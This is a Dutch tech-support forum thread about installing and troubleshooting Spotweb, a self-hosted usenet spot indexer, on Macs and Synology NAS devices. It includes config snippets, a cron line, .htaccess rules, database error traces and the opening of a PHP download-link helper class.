SpotWeb - Webbased Spotnet - deel 2 Vorige deel Overzicht

Pagina: 1 ... 22 ... 50 Laatste
Acties:

Onderwerpen

Acties:
  • 0 Henk 'm!

• MikeOO
  • Registratie: Augustus 2007
  • Laatst online: 06:49
@ge-flopt

Ik doelde op dit deel.

Another way to fix this, is by creating an file called dbsettings.inc.php in the same directory as your Spotweb files. The file needs to contain the following information:

code:
1
2
3
4
5
6
<?php
$dbsettings['engine'] = 'mysql';
$dbsettings['host'] = 'localhost';
$dbsettings['dbname'] = 'spotweb';
$dbsettings['user'] = 'spotweb';
$dbsettings['pass'] = 'spotweb';

[ Voor 7% gewijzigd door MikeOO op 08-10-2013 08:11 ]

Acties:
  • 0 Henk 'm!

• Caveman
  • Registratie: Januari 2001
  • Laatst online: 18-09 19:16

Caveman

whahoehaha

willem1509 schreef op zaterdag 05 oktober 2013 @ 13:29:
Ik heb dit forum door zitten lezen want ik krijg steeds van die wazige releases bij Couchpotato van films en/of ik vind op sommige sites films die al lang uit zijn (met nederlandse ondertiteling) maar die in couchpotato nog niet voorkomen (en ja ik heb een betaalde nieuwsgroep).. Dus ik dacht ik ga over op spotweb zodat ik een filter kan toevoegen voor mijn favoriete spotters hannes3 en inge2222.

Het punt is echter. Ik heb een mac en ik weet eerlijk gezegd niet echt goed hoe ik moet beginnen en of ik het uberhaupt op een mac kan installeren en nu lees ik ook over Newznab dat dat wel op een mac kan (een uitleg op http://forums.sabnzbd.org...cc9de10d2bbe1775006bb074d). Is dit hetzelfde principe als Spotweb of toch weer net iets anders?

Alvast bedankt:)

Oh en als de link niet geplaatst mag worden, sorry daarvoor..
Is volgens mij een kwestie van googlen......
http://www.perkussionswar...otweb-on-mac-os-x-server/

Maar als je je Mac niet altijd aan hebt staan is spotweb een beetje onzinnig, misschien kun je beter spotlite eens bekijken, gebruikt dezelfde database. http://www.spot-net.nl/spotlite/

[ Voor 7% gewijzigd door Caveman op 08-10-2013 10:11 ]

I don't need to "Get a Life." I'm a Gamer. I 've lots of Lives !

Acties:
  • 0 Henk 'm!

• willem1509
  • Registratie: December 2008
  • Laatst online: 18-08 22:49
Caveman schreef op dinsdag 08 oktober 2013 @ 10:07:
[...]

Is volgens mij een kwestie van googlen......
http://www.perkussionswar...otweb-on-mac-os-x-server/

Maar als je je Mac niet altijd aan hebt staan is spotweb een beetje onzinnig, misschien kun je beter spotlite eens bekijken, gebruikt dezelfde database. http://www.spot-net.nl/spotlite/
Ik had gegoogled... maar ik kon er niet uit komen. Ik heb al spotlite, maar ik vind het toch fijner als hij automatisch de films/series van bepaalde spotters binnenhaalt. En daar dient spotweb dan voor als ik het goed begrijp. Daarom ben ik benieuwd of ik spotweb ook kan installeren op normale mountain lion en hoe ik dit zou moeten doen?

[ Voor 7% gewijzigd door willem1509 op 08-10-2013 15:11 ]

Acties:
  • 0 Henk 'm!

• elevator
  • Registratie: December 2001
  • Niet online

elevator

Officieel moto fan :)

Cyrus The Virus schreef op maandag 07 oktober 2013 @ 10:43:
Dat heb ik dus ook, en ik had toch gesloten system gekozen bij de installatie.
Gesloten systeem staat er bij mij niet bij, dit wel:
Single user
Single user systems are one-user systems, not shared with friends or family members. Spotweb wil always be logged on using the below defined user and Spotweb will never ask for authentication.

Shared
Shared systems are Spotweb installations shared among friends or family members. You do have to logon using an useraccount, but the users who do log on are trusted to have no malicious intentions.

Public
Public systems are Spotweb installations fully open to the public. Because the installation is fully open, regular users do not have all the features available in Spotweb to help defend against certain malicious users.
Ik ga er dus van uit dat je 'Single User' gekozen hebt, en als je dan de beschrijving goed leest zie je dat het precies werkt zoals je verwacht :)

Als je de file dbsettings.inc.php wist, kan je Spotweb opnieuw configureren.

Acties:
  • 0 Henk 'm!

• renzo4000
  • Registratie: Juni 2001
  • Laatst online: 16-09 14:22
Mocht je daar geen zin in hebben kan je altijd een htcaccess / htpasswd files in je dir gooien, kunnen mensen er ook niet meer zomaar bij.

PVOUTPUT | 5400W | 15 PANELEN 360W ZUID 38° | ENPHASE ENVOY S | MICRO OMVORMERS 290W

Acties:
  • 0 Henk 'm!

• willem1509
Eindelijk spotweb op m'n mac draaien alleen kom ik niet voorbij de stap om hem automatisch te laten updaten dmv crontab.

Ik heb het volgende ingevuld:
http://cl.ly/image/3E3k261a2p1N

Als ik het opsla (eerst sec. en dan ZZ) dan geeft hij de volgende foutmelding weer:
http://cl.ly/image/0N03431j1Q2S

Kan iemand vertellen wat ik hier verkeerd doe?

Acties:
  • 0 Henk 'm!

• Cyrus The Virus
  • Registratie: Augustus 2003
  • Laatst online: 17-09 07:32
elevator schreef op woensdag 09 oktober 2013 @ 06:49:
[...]

Gesloten systeem staat er bij mij niet bij, dit wel:

[...]

Ik ga er dus van uit dat je 'Single User' gekozen hebt, en als je dan de beschrijving goed leest zie je dat het precies werkt zoals je verwacht :)

Als je de file dbsettings.inc.php wist, kan je Spotweb opnieuw configureren.
|:( niet goed gelezen dus bedankt. Ik volgens mij single user gekozen. Eens kijken of het lukt om te wijzigen naar Shared.

AMD 5950x || Asus VIII Dark Hero || G.Skill Trident Z Neo 2x16GB C16-16-16-36 || EVGA FTW3 3080 Ultra || 2x WD SN850 1TB || Corsair HX850i

Acties:
  • 0 Henk 'm!

• ge-flopt
  • Registratie: Februari 2001
  • Laatst online: 18-09 11:33
MikeOO schreef op dinsdag 08 oktober 2013 @ 08:10:
@ge-flopt

Ik doelde op dit deel.

Another way to fix this, is by creating an file called dbsettings.inc.php in the same directory as your Spotweb files. The file needs to contain the following information:

code:
1
2
3
4
5
6
<?php
Inmiddels is het opgelost. 8)7 zat in de verkeerde map de settings file aan te passen, had blijkbaar 2 mapjes.....

Acties:
  • 0 Henk 'm!

• FitzJac
  • Registratie: November 2010
  • Laatst online: 17-09 20:45
@willem1509:

Zo moet het staan:
code:
1
* /8 * * * cd /Volumes/data/Spotweb && php retrieve.php > /dev/null

Op 1 regel dus.

Acties:
  • 0 Henk 'm!

• willem1509
FitzJac schreef op woensdag 09 oktober 2013 @ 15:38:
@willem1509:

Zo moet het staan:
code:
1
* /8 * * * cd /Volumes/data/Spotweb && php retrieve.php > /dev/null

Op 1 regel dus.
Bedankt voor je hulp.. Ik zie nu wat ik verkeerd deed!! Thanks!

[ Voor 54% gewijzigd door willem1509 op 09-10-2013 16:55 ]

Acties:
  • 0 Henk 'm!

• Workaholic
  • Registratie: Februari 2003
  • Niet online
Heeft iemand toevallig een filter gemaakt voor muziek concerten? Ik wil kunnen sorteren op film media van concerten? Dit is me nu gelukt voor Muziek DVD's, maar tegenwoordig zijn er ook HD opnames..

Tegenwoordig kun je de filters exporteren/importen. Dus als iemand deze wil delen. .graag!

[ Voor 19% gewijzigd door Workaholic op 10-10-2013 08:56 ]

Mijn V&A

Acties:
  • 0 Henk 'm!

• MikeOO
Workaholic schreef op donderdag 10 oktober 2013 @ 08:56:
Heeft iemand toevallig een filter gemaakt voor muziek concerten? Ik wil kunnen sorteren op film media van concerten? Dit is me nu gelukt voor Muziek DVD's, maar tegenwoordig zijn er ook HD opnames..

Tegenwoordig kun je de filters exporteren/importen. Dus als iemand deze wil delen. .graag!
Kun je hier iets mee? Zelf nog niet gebruikt dus werking onbekend.
http://www.brainbytez.nl/spotweb-filter-creator/

Acties:
  • 0 Henk 'm!

• Lawwie
  • Registratie: Maart 2010
  • Laatst online: 17-09 16:28

Lawwie

Het beste bier, brouw je zelf!

De laatste 2 dagen heb ik problemen gehad met mijn spotweb en krijg ik telkens de volgende melding bij het openen van een spot.

Afbeeldingslocatie: http://i.imgur.com/Aox90hW.png

Gister deed hij het niet en heb ik hem een aantal keer opnieuw opgestart. Echter det verhielp het probleem niet direct. Toen ik vandaag weer keek deed hij het weer normaal. Nu net begon het probleem weer en update hij de spots ook niet meer om het uur. Spotweb draait op een windows installatie.

Acties:
  • 0 Henk 'm!

• MikeOO
Lawwie schreef op vrijdag 11 oktober 2013 @ 00:18:
De laatste 2 dagen heb ik problemen gehad met mijn spotweb en krijg ik telkens de volgende melding bij het openen van een spot.

[afbeelding]

Gister deed hij het niet en heb ik hem een aantal keer opnieuw opgestart. Echter det verhielp het probleem niet direct. Toen ik vandaag weer keek deed hij het weer normaal. Nu net begon het probleem weer en update hij de spots ook niet meer om het uur. Spotweb draait op een windows installatie.
In het plaatje staat een url www.dmik.nl.
Ik weet niet waar dit vandaag komt en of je de spotweb toevallig via die url host maar de link is niet bereikbaar en dat zou ook een verklaring kunnen zijn.

Handig om deze even wat meer info te geven.

Acties:
  • 0 Henk 'm!

• Cyrus The Virus
  • Registratie: Augustus 2003
  • Laatst online: 17-09 07:32
MikeOO schreef op donderdag 10 oktober 2013 @ 09:03:
[...]

Kun je hier iets mee? Zelf nog niet gebruikt dus werking onbekend.
http://www.brainbytez.nl/spotweb-filter-creator/
Handige link, ik wou filter toevoegen, maar nu ben ik de oude kwijt :P
Kan ik ergens dat orginele XML file nog downloaden ?

AMD 5950x || Asus VIII Dark Hero || G.Skill Trident Z Neo 2x16GB C16-16-16-36 || EVGA FTW3 3080 Ultra || 2x WD SN850 1TB || Corsair HX850i

Acties:
  • 0 Henk 'm!

• joopworst
  • Registratie: Oktober 2004
  • Laatst online: 06-06 09:20
Ik heb de laatste git pull draaien van de refactor branch maar kan geen spots adden. Wanneer ik op add spot druk gaat het rondje draaien en laad de pagina met spot gegevens opnieuw. Ook bij My Spots komt de nieuwe spot niet te staan. Heeft iemand een idee waar ik kan kijken wat er fout gaat.
Aan mijn usenet provider zal het denk ik niet liggen want spots adden via Spotnet gaat wel met XSnews.

Quid est fili?!

Acties:
  • 0 Henk 'm!

• SpoekGTi
  • Registratie: April 2005
  • Laatst online: 18-09 19:24
Dag allen, ik wend me tot jullie, ik kom er niet uit, google weet het ook niet helemaal denk ik en een vriend van mij die meer verstand heeft van sql en apache enzo ook niet.

Spotweb heb ik geinstalleerd en werkend op een DS412+, ophalen van spots werkt met een cronjob kortom so far so good.

Koppeling met Couchpotato werkt, maar ik krijg de koppeling met Sickbeard maar niet voor elkaar. Ook op het http://10.0.10.10/spotweb/api?t=c krijg ik geen response als zijnde een XML output.

Het rare hier aan is dat Couch op dezelfde manier ermee zou werken dus die het eigenlijk ook niet zou moeten doen, maar die werkt dus wel........:S

Ik heb al zitten klooien met de .htaccess file in mijn /10.x.x.x/web/spotweb en als ik die volledig vernachel dan krijg ik wel een pagina te zien dat de website niet gevonden kan worden maar als ik hem neer zet zoals hieronder:

RewriteEngine on
RewriteCond %{REQUEST_URI} !api/
RewriteBase /spotweb/
RewriteRule api/?$ index.php?page=newznabapi [QSA]
RewriteRule details/([^/]+) index.php?page=getspot&messageid=$1 [L]

dan krijg ik dus niets.......

Voor zover ik en hij konden zien zijn deze waarden correct en ook de waarden voor Apache staan goed:

<Directory /var/www/spotweb/>
Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
Satisfy all
</Directory>

Ik heb nu alles al geprobeerd, ben zelfs al helemaal schoon begonnen (SQL bases ook weggegooid) package gedeinstalled en de map ook weggegooid.

Ik heb de package gebruikt van de Synocommunity (gewoon via packagecenter geinstalleerd.

Heeft iemand nog ideeën?

Always tell people you have a plan even if you don't. People will always love to hear that you have a plan. It gives hope.

Acties:
  • 0 Henk 'm!

Verwijderd

Lawwie schreef op vrijdag 11 oktober 2013 @ 00:18:

[afbeelding]

Vaak krijg je deze melding als het aantal kanalen naar je newsserverprovider op zijn. Mocht deze melding verschijnen dan kun je als test even je downloads pauzeren. Indien de melding dan verdwijnt dien je het aantal kanalen dat je gebruikt voor downloaden te verlagen zodat er nog wat kanalen overblijven voor spotweb zelf.

Acties:
  • 0 Henk 'm!

• style2k
  • Laatst online: 03-01 15:04

style2k

hmm

echt het is echt waardeloos . toen ik het gewoon op me pc had staan kon ik gewoon retrieven en kreeg ik ik nieuwe spots binnen al was het er maar 1 . nu heb ik dus ook op de synology een script laten draaien elk uur voor een paar dagen . en ff niet meer naar om gekeken . nu heb ik ff gekeken en loop ik weer 8 uur achter ?????? terwijl op een andere pc waar spotnet nog opstaat kan ik elke minuut op retrieve drukken en krijg ik up to date spots binnen dus het is niet zo dat er geen spots zijn . ik snap er nix meer van. ik wil gewoon op spotweb inloggen op retrieve drukken en dan laatste nieuwe spots binnen krijgen dat is toch wat het programma hoort te doen pfff

[ Voor 12% gewijzigd door style2k op 11-10-2013 23:22 ]

hmm

Acties:
  • 0 Henk 'm!

• CH4OS
  • Registratie: April 2002
  • Niet online

CH4OS

It's a kind of magic

SpoekGTi schreef op vrijdag 11 oktober 2013 @ 12:34:
Dag allen, ik wend me tot jullie, ik kom er niet uit, google weet het ook niet helemaal denk ik en een vriend van mij die meer verstand heeft van sql en apache enzo ook niet.

Spotweb heb ik geinstalleerd en werkend op een DS412+, ophalen van spots werkt met een cronjob kortom so far so good.

Koppeling met Couchpotato werkt, maar ik krijg de koppeling met Sickbeard maar niet voor elkaar. Ook op het http://10.0.10.10/spotweb/api?t=c krijg ik geen response als zijnde een XML output.

Het rare hier aan is dat Couch op dezelfde manier ermee zou werken dus die het eigenlijk ook niet zou moeten doen, maar die werkt dus wel........:S

Ik heb al zitten klooien met de .htaccess file in mijn /10.x.x.x/web/spotweb en als ik die volledig vernachel dan krijg ik wel een pagina te zien dat de website niet gevonden kan worden maar als ik hem neer zet zoals hieronder:

RewriteEngine on
RewriteBase /spotweb/

Voor zover ik en hij konden zien zijn deze waarden correct en ook de waarden voor Apache staan goed:

Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
Satisfy all
</Directory>

Ik heb nu alles al geprobeerd, ben zelfs al helemaal schoon begonnen (SQL bases ook weggegooid) package gedeinstalled en de map ook weggegooid.

Ik heb de package gebruikt van de Synocommunity (gewoon via packagecenter geinstalleerd.

Heeft iemand nog ideeën?
Kijk even wat er gebeurd als je de RewriteBase even in comment zet, met een # ervoor. :)
style2k schreef op vrijdag 11 oktober 2013 @ 23:19:
echt het is echt waardeloos . toen ik het gewoon op me pc had staan kon ik gewoon retrieven en kreeg ik ik nieuwe spots binnen al was het er maar 1 . nu heb ik dus ook op de synology een script laten draaien elk uur voor een paar dagen . en ff niet meer naar om gekeken . nu heb ik ff gekeken en loop ik weer 8 uur achter ?????? terwijl op een andere pc waar spotnet nog opstaat kan ik elke minuut op retrieve drukken en krijg ik up to date spots binnen dus het is niet zo dat er geen spots zijn . ik snap er nix meer van. ik wil gewoon op spotweb inloggen op retrieve drukken en dan laatste nieuwe spots binnen krijgen dat is toch wat het programma hoort te doen pfff
Kijk dan eerst eens of er een update is. Repareer de database desnoods met php upgrade-db.php, beetje de standaard dingen. Spotweb is niet een kwestie van installeren en klaar.

[ Voor 88% gewijzigd door CH4OS op 11-10-2013 23:31 ]

Acties:
  • 0 Henk 'm!

• style2k
  • Laatst online: 03-01 15:04

style2k

hmm

geen update voor zover ik kan zien

hmm

Acties:
  • 0 Henk 'm!

• MikeOO
Cyrus The Virus schreef op vrijdag 11 oktober 2013 @ 08:35:
[...]

Handige link, ik wou filter toevoegen, maar nu ben ik de oude kwijt :P
Kan ik ergens dat orginele XML file nog downloaden ?
Je kan in de instellingen van Spotweb (rechtboven) bij Filters een import/export en een reset doen.
Dan krijg je de originele weer.

Acties:
  • 0 Henk 'm!

• MikeOO
joopworst schreef op vrijdag 11 oktober 2013 @ 10:42:
Ik heb de laatste git pull draaien van de refactor branch maar kan geen spots adden. Wanneer ik op add spot druk gaat het rondje draaien en laad de pagina met spot gegevens opnieuw. Ook bij My Spots komt de nieuwe spot niet te staan. Heeft iemand een idee waar ik kan kijken wat er fout gaat.
Aan mijn usenet provider zal het denk ik niet liggen want spots adden via Spotnet gaat wel met XSnews.
En als je als test het eens probeert met een andere browser. Wil soms ook helpen.

Acties:
  • 0 Henk 'm!

• MikeOO
Als het waardeloos is dan zou niemand het gebruiken. Spotweb is een goed product. Vergeet niet dat het gratis is en dat de maker die belangeloos doet. Het is altijd zo makkelijk om maar te roepen dat iets niet goed is maar hij doet het toch maar terwijl andere alleen maar klagen.

Ik heb Spotweb hier al een aantal jaren draaien op een DS211 en dat gaat prima. 3x per jaar dat er een keer geen update niet goed is gedaan en dat meestal is de reden een post die niet goed is en de retrieve niet goed gaat en dat zit dan meer aan de kant van de nieuwsservers en echt niet aan Spotweb.

Er zijn meerdere reden waardoor dit kan gebeuren. Meestal begin je met een handmatige Retrieve te draaien in Putty. Als die niet goed gaat dan krijg je een foutmelding en dan kun je daar op zoeken in Google wat de reden is.

Als je via een cronjob om de 30 min een retrieve laat lopen hoef je alleen maar Spotweb te openen en klaar ben je. De retrieve knop werkt meestal traag.

Vergeet niet dat je PC vele malen sneller is dan een NAS.

Acties:
  • 0 Henk 'm!

• MikeOO
SpoekGTi schreef op vrijdag 11 oktober 2013 @ 12:34:

RewriteEngine on
RewriteBase /spotweb/

Options FollowSymLinks
AllowOverride All
Order deny,allow
Allow from all
Satisfy all
</Directory>

Heeft iemand nog ideeën?
Heb je Spotweb wel toegevoegd in Sickbeard als Newznab en API key van Spotweb en URL van spotweb goed ingevuld.

De .htaccess die ik gebruik ziet er zo uit. Rechten op dit bestand: 0644

code:
1
2
3
4
5
Options Indexes FollowSymLinks Multiviews
RewriteEngine on
RewriteBase /spotweb/
RewriteRule api/?$ index.php?page=newznabapi [QSA,L]

Vergeet ook niet om Apache opnieuw te starten als je hier iets aanpast.

Acties:
  • 0 Henk 'm!

• Caveman

Caveman

whahoehaha

Er zijn verschillende mogelijkheden;
Als je NAS druk is met iets anders, kan het wel eens een keer mis gaan.
Heb je wel een draadje vrij gelaten voor spotweb, als je nas aan het downloaden is en je gebruikt al je threads voor je download, dan kan spotweb niet updaten. Altijd een thread (of 2) minder doen dan je max bij je SABnzb of nzbget oid.

Acties:
  • 0 Henk 'm!

• ozzykillbirdy
  • Registratie: September 2011
  • Laatst online: 00:07
Hey jongens, ik denk dat jullie hier wel iets mee zijn:

http://www.spot-net.nl/fo...c.php?f=32&p=53753#p53753

Dit voor de nieuwe methode van spotten voor QoQ.

Acties:
  • 0 Henk 'm!

• SpoekGTi
MikeOO schreef op zaterdag 12 oktober 2013 @ 08:44:
[...]

Heb je Spotweb wel toegevoegd in Sickbeard als Newznab en API key van Spotweb en URL van spotweb goed ingevuld.

De .htaccess die ik gebruik ziet er zo uit. Rechten op dit bestand: 0644

code:
1
2
3
4
5
Options Indexes FollowSymLinks Multiviews
RewriteEngine on
RewriteBase /spotweb/
RewriteRule api/?$ index.php?page=newznabapi [QSA,L]

Vergeet ook niet om Apache opnieuw te starten als je hier iets aanpast.
@ CaptChoas, had ik ook al geprobeerd en dat levert niets op.

@MikeOO,

Jouw code overgenomen, Apache geherstart, helaas hetzelfde, gewoon een blanco pagina. En ja, bij SB staat alles goed, ik zie hem in de logs ook proberen maar hij zegt dat hij geen data krijgt.

Kwam verder terug in dit topic wel nog iets tegen over php base dir, maar daar ben ik niet aangeweest en dat staat in mijn Syno gewoon op standaard dus.

Always tell people you have a plan even if you don't. People will always love to hear that you have a plan. It gives hope.

Acties:
  • 0 Henk 'm!

• MikeOO
SpoekGTi schreef op zaterdag 12 oktober 2013 @ 19:37:
[...]

@MikeOO,

Jouw code overgenomen, Apache geherstart, helaas hetzelfde, gewoon een blanco pagina. En ja, bij SB staat alles goed, ik zie hem in de logs ook proberen maar hij zegt dat hij geen data krijgt.

Kwam verder terug in dit topic wel nog iets tegen over php base dir, maar daar ben ik niet aangeweest en dat staat in mijn Syno gewoon op standaard dus.
Het is inderdaad erg lastig om dit werkend te krijgen ondanks dat de stappen zo eenvoudig zijn. Ben zelf ook een tijd bezig geweest maar geen idee meer wat uiteindelijk de oplossing was.

Check deze stappen eens. Ik weet niet hoe je Spotweb hebt geïnstalleerd zelf of via package maar check eens of je aan de eerste stappen voldoet voor bv DSM. Mogelijk dat hierin nog iets ontbreekt.

Herstart af en toe ook je NAS eens een keer. Sommige problemen lossen zich ook op na een herstart.
Als je iets vergeet te herstarten dan blijf je zoeken terwijl een herstart dit dan oplost.

Acties:
  • 0 Henk 'm!

• SpoekGTi
OK, zal de NAS eens rebooten, alle stappen icm DSM e.d. staan goed. Heb spotweb gewoon via package geinstalleerd.

Ok, update van mij, nas gereboot, nog steeds dezelfde melding op de pagina waar een xml output moet komen (blijft dus blanco)

Maar de logs van SB zeggen nu dat hij gewoon files kan halen......

Vraag niet hoe het kan maar profiteer ervan :P

Kortom hij doet het.

[ Voor 54% gewijzigd door SpoekGTi op 13-10-2013 14:45 ]

Acties:
  • 0 Henk 'm!

• joopworst
  • Registratie: Oktober 2004
  • Laatst online: 06-06 09:20
Helaas nog steeds hetzelfde probleem :( iemand anders nog een tip?
geprobeerd met Chrome en Safari btw
MikeOO schreef op zaterdag 12 oktober 2013 @ 08:24:
[...]

En als je als test het eens probeert met een andere browser. Wil soms ook helpen.

[ Voor 6% gewijzigd door joopworst op 13-10-2013 12:15 ]

Quid est fili?!

Acties:
  • 0 Henk 'm!

• Rikkiz0r
  • Registratie: Januari 2009
  • Niet online
Ik heb gisteren geprobeerd om mijn Spotweb te migraten naar de refactor branch. Echter gaf die na het migraten de melding dat ik upgrade-db.php moest draaien. Dus ik upgrade-db.php draaien, toen kwam er een melding dat ik ook even migrate-cache.php moest draaien, ook gedaan. Echter bleef dat script hangen (hele nacht Putty open laten staan). Echter krijg ik nu als ik weer upgrade-db.php draai deze foutmelding en is spotweb onbereikbaar.

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
        Validating spotteridblacklist(ouruserid)
        Validating spotteridblacklist(idtype)
        Validating spotteridblacklist(origin)
        Validating spotteridblacklist(doubled)

SpotWeb crashed

Database schema or settings upgrade failed:
   42S02: 1146: Table 'spotweb.cache' doesn't exist

#0 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/lib/dbeng/dben                                                                                                                                                             g_pdo.php(123): dbeng_pdo->exec('SELECT COUNT(1)...', Array)
#1 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/lib/dbstruct/S                                                                                                                                                             potStruct_abs.php(577): dbeng_pdo->singleQuery('SELECT COUNT(1)...', Array)
#2 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/lib/services/U                                                                                                                                                             pgrade/Services_Upgrade_Base.php(42): SpotStruct_abs->updateSchema()
#3 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/upgrade-db.php                                                                                                                                                             (44): Services_Upgrade_Base->database()
#4 {main}

Dit is de error die ik krijg als ik migrate-cache.php opnieuw draai:
code:
1
2
3
4
5
6
7
8
9
10
11
12
php migrate-cache.php
Removing serialized entries from database

SpotWeb crashed

Cache migration failed:
   42S02: 1146: Table 'spotweb.cache' doesn't exist

#0 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/lib/dbeng/dbeng_pdo.php(74): dbeng_pdo->exec('DELETE FROM cac...', Array)
#1 /var/zpanel/hostdata/zadmin/public_html/buttcracker_nl/spotweb/migrate-cache.php(53): dbeng_pdo->modify('DELETE FROM cac...')
#2 {main}

Heeft iemand enig idee hoe ik dat kan oplossen? Kan ik die tabel handmatig aanmaken?

[ Voor 11% gewijzigd door Rikkiz0r op 13-10-2013 20:45 ]

Acties:
  • 0 Henk 'm!

• CH4OS
  • Niet online

CH4OS

It's a kind of magic

Handmatig kan, maar moet je nog wel kolommen hebben, ik vind het wel een beetje vreemd dat die tabel is verdwenen, daarin gaat namelijk de cache van de spots.

upgrade-db.php checked of de database die er is, of die goed is qua structuur. Draai dus even opnieuw php upgrade-db.php.

Acties:
  • 0 Henk 'm!

• Rikkiz0r
  • Registratie: Januari 2009
  • Niet online
Die error treed juist op als je upgrade-db.php draait.
Ik denk dat het dus database weggooien en rebuilden wordt?

[ Voor 35% gewijzigd door Rikkiz0r op 13-10-2013 22:33 ]

Acties:
  • 0 Henk 'm!

• ozzykillbirdy
  • Registratie: September 2011
  • Laatst online: 00:07
ozzykillbirdy schreef op zaterdag 12 oktober 2013 @ 12:21:
Hey jongens, ik denk dat jullie hier wel iets mee zijn:

http://www.spot-net.nl/fo...c.php?f=32&p=53753#p53753

Dit voor de nieuwe methode van spotten voor QoQ.
Nog even ter verduidelijking:

Sinds kort spot QoQ met hideref redirect, encrypted links in spotweb.
Dit geeft als gevolg dat je de downloadknop niet meer kon gebruiken.
De link hierboven geeft weer hoe je dit kan oplossen>
Ook zou couchpotato hierdoor terug spots moeten kunnen vinden, al is dit mij nog niet gelukt.
Laat ffe weten of het goed werkt als je het eens test :)

[ Voor 7% gewijzigd door ozzykillbirdy op 14-10-2013 23:38 ]

Acties:
  • 0 Henk 'm!

• renzo4000
ozzykillbirdy schreef op maandag 14 oktober 2013 @ 23:36:
[...]

Ook zou couchpotato hierdoor terug spots moeten kunnen vinden, al is dit mij nog niet gelukt.
Ik heb dit toegevoegd zoals hierboven beschreven en meteen geprobeerd ... ik krijg helaas toch een faillure bij een recente QoQ release. Moet ik iets restarten oid omdat het wellicht nog niet verwerkt is?

PVOUTPUT | 5400W | 15 PANELEN 360W ZUID 38° | ENPHASE ENVOY S | MICRO OMVORMERS 290W

Acties:
  • 0 Henk 'm!

• m-buurman
  • Registratie: Juni 2007
  • Nu online

m-buurman

hmmm...coffee!!

Er staat al een tijdje een issue (#1813) uit bij Spotweb op Github over de encrypted links, zodra ik iets tegenkom wat niet werkt dan kaart ik het daar aan en wordt het vrij snel opgepikt.

Hideref.org had ik al aangegeven maar lijkt nog niet gefixt te zijn, zal de vermoedelijke oplossing van het spot-net forum doorgeven.

Acties:
  • 0 Henk 'm!

• renzo4000
m-buurman schreef op dinsdag 15 oktober 2013 @ 09:27:
Er staat al een tijdje een issue (#1813) uit bij Spotweb op Github over de encrypted links, zodra ik iets tegenkom wat niet werkt dan kaart ik het daar aan en wordt het vrij snel opgepikt.

Hideref.org had ik al aangegeven maar lijkt nog niet gefixt te zijn, zal de vermoedelijke oplossing van het spot-net forum doorgeven.
Ik heb toegevoegd wat er staat en tevens voor de zekerheid gereboot (jammerrrr daar gaat mijn uptime :P) ... helaas nog steeds faillures. Zijn er mensen waarbij dit wel gelukt is (icm een synology nas)?

heb het opnieuw geprobeerd, het werkt nu wel :)

[ Voor 4% gewijzigd door renzo4000 op 16-10-2013 13:45 ]

Acties:
  • 0 Henk 'm!

• MikeOO
ozzykillbirdy schreef op maandag 14 oktober 2013 @ 23:36:
[...]

Bedenk wel dat dit alleen voor de master branch werkt. Als je de refactor versie gebruikt dan werkt nog steeds niet. https://github.com/spotweb/spotweb/issues/1919.

[ Voor 10% gewijzigd door MikeOO op 17-10-2013 07:54 ]

Acties:
  • 0 Henk 'm!

• Deem
  • Registratie: Augustus 2001
  • Laatst online: 05-09 11:13

Deem

Ontcijfer mij!

spotalternatedownload.php
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
<?php
/**
*
* This class is used to find alternate download urls for nzb's.
*
*/
class SpotAlternateDownload {
protected $spot = null;
protected $alternateDownloadUrl = null;
protected $nzb = null;

public function __construct($spot) {
$this->spot = $spot;
}

/**
*
* Check for specific string to check if we have an alternate download url.
* @param array $this->spot
*/
public function hasUrlForSpot() {
if ($this->alternateDownloadUrl) {
return true;
}

// Array containing url matches. Must contain the first part of the url.
$matches = array(
'http://base64.derefer.me',
'http://derefer.me',
'http://alturl.com',
